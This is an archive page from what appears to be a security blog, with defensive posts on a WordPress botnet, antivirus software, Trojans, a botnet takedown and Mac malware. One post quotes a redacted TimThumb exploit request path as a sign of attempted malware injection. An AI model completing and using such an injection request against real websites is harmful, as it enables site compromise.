Category Archives: Malware

Malware, Trojans, Virus, Internet Security

Massive Number Websites in Botnet

Read this article here

Massive Number Websites in Botnet

Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack

website botnet thumbnail imageFor the past couple of days we’ve been watching a customers WordPress site being attacked by a botnet of websites trying to access site admin with user name “admin” and a variety of simple passwords.

Most of these attacks are coming from USA based web hosting services. One particular top level service provider, Provo Unified Layer, stands out above the rest as the most hacked network. Many 2nd tier providers use Provo Unified Layer infrastructure including Bluehost and Hostmonster. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet.

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

Microsoft Security Essentials LogoA look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware.

Installing Microsoft Security Essentials was easy. The basic installer downloaded fast, and ran without any conflicts (Win XP 32 bit and Win7 (Enterprise Developers) 64bit. A few options were offered. Read More.

Microsoft Security Essentials

Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to picasa spoof malwareinject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=***** (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Any query string repeating www. is suspicious, although it way have been a user error – often by copy/pasting a link without fully overwriting the existing address, but then at least the first www reference will normally be your blog or website (or a page on it). If a search engine has indexed something like this resulting in a broken link to your site – whoever posted the link probably made a mistake, and it should be redirected to a suitable page… Read More

Picasa Spoofed for Malware Injection

Soccer Trojan from South Africa

Home Grown Malware?

Satelite Image of South Africa

Image from Wikipedia

It looks like Trojan tvwjfm.exe (with several other names too – list of known names and further information) could have originated from South Africa. At least the first reported  infections came from this locale.

This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.

Soccer Trojan

Soccer TrojanI have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.

Rove Digital operated a botnet consisting over four million (4 000 000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems will typically have their Domain Name Server (DNS) changed to point to foreign IP addresses.

Rove digital appears on the surface as a legitimate business, with established offices in Tartu, Estonia. They are the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of  criminal methods to earn money from the DNS changers. The cyber crime network has operated from 2006.

Operation Ghost Click

Read the rest of this entry

Website Hacking Attack

Hacking Attempt from IP

An unsuccessful attempt to hack my website was made Friday 21 October 2011 shortly before 15h00 SAST  (13h00 GMT).

Satellite image of hacker in dubai location

Click image for larger view (image from Google Earth)

The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ messages resulting from the hacker using URLS while trying to get access to the server and website setup files, and to log-in to unauthorised and prohibited areas of the website and server. The server is set to send notifications to me of 404, 403 and similar errors.

The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Juneirah, Dubai, United Arab Emirates. The business is located in a warehouse or freight depot. Identified from the IP addresses used during the attack – IP and It appears two hackers were working simultaneously.

I should thank these ill intended persons for testing the security of the website and server. Each incident is an opportunity to examine security, to improve the strength of the server environment.

Read the rest of this entry

Trojan Generic24 Family

Article about Trojan Horse Generic24.cgol

The previous article posted on this blog about Generic 24 Trojans elicited a lot of interest. Even more interest was shown in my removal tips for the generic24.cgol variant, posted on my website.

I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat, however it seems everyday that a new version is detected. Recent references I found include;

  • trojan generic 24 cjgk (also generic24.cjgk (20 Sept 2011)
  • trojan Generic24.BRQA 
  • trojan Generic24.BRQD
  • trojan Generic24.BRQF etc (Full list at AVG)
  • Trojan Horse generic24.TSU (21 Sept 2011)
  • trojan Generic24.BUOM
  • Generic24.BVUA (22 Sept 2011)
  • trojan generic24 pnt (12 Sept 2011)
  • GENERIC 24.CPQJ (23 Sept 2011)
  • trojan-generic24-aawj (12 Sept 2011)
  • Trojan horse Generic24.CAVY (21 Sept 2011)
  • GENERIC 24.CPQJ (23 Sept 2011)
  • Generic24.BIVS (2 Sep 2011)
  • Generic24.FLZ (05 Oct 2011)
  • Trojan horse Generic24.PYB (01 Oct 2011)
  • Generic24.ATJW (03 Sept 2011)
  • Trojan horse Generic 24.WMQ (24 Sept 2011)

The list goes on; these are from recent forums and other articles found via a search engine, from Sept this year.

There are literally thousands of similar malware trojans with the name ‘generic’

One common factor is they are generally considered hacking malware, opening a backdoor to other viruses which capture personal information from the user of an infected PC.

Again I stress the importance of early intervention should one of these trojans infect your PC.

The removal tips at the above web address can be used to fix most early infections by looking for similar HKEY references to those mentioned for FireFox

Apple Mac Not Immune to Malware

Apple Macs do get Malware

Macs get worms tooHow often do we still hear Mac users blithely proclaiming they have no need for Anti Virus software because Macs don’t get viruses. Well Mac users, those days are gone for good, if they ever existed at all.

The fact that what some regard as the world’s first virus, “Elk Cloner”, was a Mac virus seems to have exited people’s minds.

The hardness of Mac’s Unix core operating system perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also in the old days Mac users were a very small group of computers users, mainly professionals involved in the print and graphics industries, not a big enough target for virus creators to spend their time on.

Mac users have been complacent, secure in the expectation their systems are safe;  At one time I was one of them. I used Macs for years with no AV software installed.

Recent Mac Viruses

Only a few months ago, MacDefender Tojan Horse was happily infecting Macs around the world, and just today, an article from Sophos Naked Security highlights another Mac trojan, OSX/Revir-B.

These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.

Macs can give Window Malware

Is it safe to use Macs with no AV softwareHow often do files get transferred from Mac to Windows platforms. How often do vulnerable removable drives get used to transfer these files.

Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!

Or another example;
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.

Mac Users, break the malware chain, get your Macs protected. The days of Mac immunity to malware are gone for ever.